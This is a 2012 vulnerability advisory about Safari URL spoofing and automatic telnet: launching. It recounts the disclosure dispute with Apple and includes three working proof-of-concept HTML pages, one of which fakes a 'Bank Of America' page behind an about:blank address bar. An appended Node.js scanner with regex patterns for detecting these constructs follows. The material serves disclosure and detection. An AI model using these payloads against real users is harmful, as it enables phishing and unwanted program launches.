#####################################
Safari for Windows and iOS URL Spoof
Vendor URL: http://www.apple.com
Advisory: http://lostmon.blogspot.com/2012/03/safari-for-windows-and-ios-url-weakness.html
Vendor notified: YES
PoC available: YES
#####################################

#############
History
#############

Yesterday I read a news item about a Safari for iOS URL spoof vulnerability at
http://iclarified.com/entry/comments.php?enid=20858

I want to clarify that I had reported this vulnerability on 12/03/2011 to Apple
Product Security via MSVR (I have the mails that demonstrate it). So Apple didn't
patch it and this vuln is one year old.

I had reported a telnet automatic execution in Safari for Windows... and they
patched it in silence... no credits, no info...

This is the response about the telnet execution from Apple:

"Issue 1: We do not see any security implications with allowing telnet
connections. There is an existing enhancement request for OS X to provide a
warning dialog."

Yes, but not in Windows, and if you are doing apps for Windows you can't say it
does not work in OS X. It works in Safari for Windows prior to 5.1.4.

Issue 2: URL Spoof

I found, some time ago, an RCE in IE 6, 7 and 8 (see MS011-57); it also affects
the QtWeb browser and Safari for Windows. I reported it to Apple and sat quiet
and waited till Apple patched.

So what happened? After a year of reporting, the vuln continues working and
other researchers have published it (http://majorsecurity.net), but I would
like to clarify that I reported it to Apple one year ago!!!

Response from Apple:

"Issue 2: The outside third party you are coordinating with already sent this
issue to us on January 10, 2011. It does not appear possible to spoof arbitrary
URLs in the address bar (i.e. while the title may say "Bank of America" in the
proof-of-concept, you can't spoof the address bar to read
https://bankofamerica.com). Given that the most serious impact of this issue is
that you can prevent the user from using the address bar in the newly created
tab, we do not have a timetable to resolve this issue."

Look at his PoC/exploit and look at my PoC code:

His code => http://majorsecurity.net/html5/ios51-demo.html
My code  => http://lostmon.blogspot.com/2011/10/qtweb-internet-browser-url-weakness.html

This is similar code to what I had reported to Apple.

Bad words for Apple on security!!!!!!!!!!! and bad work with security
researchers :/

################
Sample codes
################

############ BOF Safari.html #################
<html>
<title>Safari unauth telnet execution by lostmon</title>
<script type="text/javascript" language="javascript">
function redirect() {
  location.replace("telnet:192.168.1.1");
}
</script>
<body onLoad="redirect();">
</body>
</html>
############### EOF ################

2- URL spoof or about:blank spoof

This issue can be used to spoof URL locations or to show fake content without
any URL in the address bar.

- Open the PoC and click on "invoke PoC" and look at the address bar: it does
  not show any URL.... (safari2.html)
- Open the PoC and click on "invoke PoC" (safari3.html). Look at the address
  bar: it shows "about:blank" but it isn't at about:blank. And look at the page
  title :) This can be used to spoof content.

############## BOF safari2.html #################
<html>
<head>
<title>About:blank Url spoofing using document.open() testcase</title>
<script type="text/javascript"><!--
var wx;
function invokePoC() {
  wx = open("","newwin");
  setInterval("doit()",1);
}
function doit() {
  wx.document.open();
  wx.document.write('OWNED OWNED OWNED');
}
// -->
</script>
</head>
<body>
<h1>About:blank Url spoofing using document.open() testcase</h1>
<noscript><p>this testcase requires JavaScript to run.</p></noscript>
<p><a href="javascript:invokePoC();">invoke PoC</a></p>
</body>
</html>
################# EOF ################################

#################### BOF safari3.html ###################
<html>
<head>
<title>About:blank Url spoofing using document.open() testcase</title>
<script type="text/javascript"><!--
var wx;
function invokePoC() {
  wx = open("about:blank","newwin");
  setInterval("doit()",1);
}
function doit() {
  wx.document.open();
  wx.document.write('<html><title>Bank Of America</title>OWNED OWNED OWNED<br></html>');
}
// -->
</script>
</head>
<body>
<h1>About:blank Url spoofing using document.open() testcase</h1>
<noscript><p>this testcase requires JavaScript to run.</p></noscript>
<p><a href="javascript:invokePoC();">invoke PoC</a></p>
</body>
</html>
##################### EOF ##############################

I would like to thank MSVR for their concern about this issue and for talking
about it with Apple. MSVR is a very good program and they do A VERY GOOD WORK on
security!!!!!

--
Yours sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what moves the mind....
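The following is an added example, not part of lostmon's advisory and not Apple's or MSVR's code: a small Node.js heuristic that a defender can run over saved page sources or proxy captures to flag the two constructs the sample codes above rely on, a link or redirect to a local protocol handler scheme (telnet: in Safari.html) and a blank window whose document is rewritten from the opener via document.open()/document.write() (safari2.html and safari3.html). The scheme list, the rule regexes, the verdict labels and the three sample pages are all assumptions constructed for this example; the samples are shaped like the PoCs above but are not copies of them.

```javascript
// Added example, not lostmon's code: a heuristic reviewer for page sources or
// proxy captures that flags the two constructs the advisory's PoCs rely on.
// Everything here is string matching, so obfuscated code evades it and benign
// code can trip it; a hit is a prompt to read the page, not a verdict.

// Schemes that hand the URL straight to a local program. "telnet" is the one
// in the advisory; rlogin and ssh are assumed additions.
const HANDLER_SCHEMES = ["telnet", "rlogin", "ssh"];

const RULES = [
  {
    id: "handler-scheme-url",
    why: "URL handed to a local protocol handler (advisory: telnet: auto-launch)",
    re: new RegExp(`\\b(?:${HANDLER_SCHEMES.join("|")}):[^\\s"'<>)]+`, "gi"),
  },
  {
    id: "blank-window-open",
    why: "window opened on an empty or about:blank URL",
    re: /\bopen\(\s*(["'])(?:about:blank)?\1\s*(?:,|\))/gi,
  },
  {
    id: "cross-window-rewrite",
    why: "another window's document rewritten via document.open()/write()",
    re: /\b(?!window\b|self\b|document\b)([A-Za-z_$][\w$]*)\.document\.(?:open|write|writeln)\s*\(/g,
  },
];

// Run every rule over the source and return one finding per match.
function scanHtml(source) {
  const findings = [];
  for (const rule of RULES) {
    rule.re.lastIndex = 0; // global regexes keep their position between calls
    let m;
    while ((m = rule.re.exec(source)) !== null) {
      findings.push({ rule: rule.id, why: rule.why, offset: m.index, snippet: m[0] });
    }
  }
  return findings;
}

// Turn findings into a verdict. The about:blank spoof needs both halves of
// the pattern (blank window plus cross-window rewrite); a handler-scheme URL
// is reason enough on its own.
function assess(source) {
  const findings = scanHtml(source);
  const ids = new Set(findings.map((f) => f.rule));
  const reasons = [];
  if (ids.has("blank-window-open") && ids.has("cross-window-rewrite")) {
    reasons.push("about:blank address-bar spoof pattern");
  }
  if (ids.has("handler-scheme-url")) {
    reasons.push("local protocol handler launch");
  }
  return { level: reasons.length > 0 ? "review" : "clean", reasons, findings };
}

// Constructed samples shaped like the advisory's PoCs; not the originals.
const SAMPLE_SPOOF = `
<script>
var wx;
function invokePoC() { wx = open("about:blank", "newwin"); setInterval("doit()", 1); }
function doit() { wx.document.open(); wx.document.write('<title>Example Bank</title>spoofed'); }
</script>`;

const SAMPLE_TELNET = `<body onload="location.replace('telnet:192.0.2.10')"></body>`;

// A page writing to its own document and opening a real URL should stay clean.
const SAMPLE_BENIGN = `
<script>
function help() { window.open("https://example.com/help", "_blank", "noopener"); }
document.write("<p>hello</p>");
</script>`;

for (const [name, src] of Object.entries({ SAMPLE_SPOOF, SAMPLE_TELNET, SAMPLE_BENIGN })) {
  const r = assess(src);
  console.log(`${name}: ${r.level} ${r.reasons.join("; ")}`);
  for (const f of r.findings) console.log(`  [${f.rule}] @${f.offset}: ${f.snippet}`);
}
```

The verdict deliberately requires both halves of the spoof pattern: plenty of legitimate pages open a blank window and later navigate it, and plenty write into their own document, but a handle to a blank child window that is then filled by document.open()/document.write() is exactly the shape that leaves the address bar showing nothing or "about:blank" while the content is attacker-chosen.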